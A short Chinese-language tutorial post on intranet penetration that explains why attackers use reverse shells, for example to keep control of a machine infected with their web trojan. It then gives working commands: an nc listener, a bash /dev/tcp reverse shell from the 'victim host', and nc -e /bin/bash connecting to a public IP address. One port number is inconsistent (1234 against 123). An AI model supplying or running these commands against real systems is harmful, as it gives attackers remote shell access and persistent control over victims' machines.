内网渗透必备,将权限反弹到互联网主机上
关于反弹shell的原因通常有这几种:
1)某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2)它的ip会动态改变,你不能持续控制。
3)由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的
Shell 反弹工具nc
A主机10.1.1.100 接受shell的主机
B主机10.1.1.101 发出shell的受害主机
方式1:利用主机b的bash反弹shell
A:nc –lvvp 1234
B: bash -i >& /dev/tcp/10.1.1.100/123 0>&1
方式2:两边都利用nc反弹
A:监听端口等待接受shell
nc –lvvp 1234

B: 将shell发送到远程服务器上
nc 106.13.230.211 1234 -t -e /bin/bash

在远程服务器上执行命令

学习更多的方法可以参考:https://klionsec.github.io/2016/09/27/revese-shell/
网友评论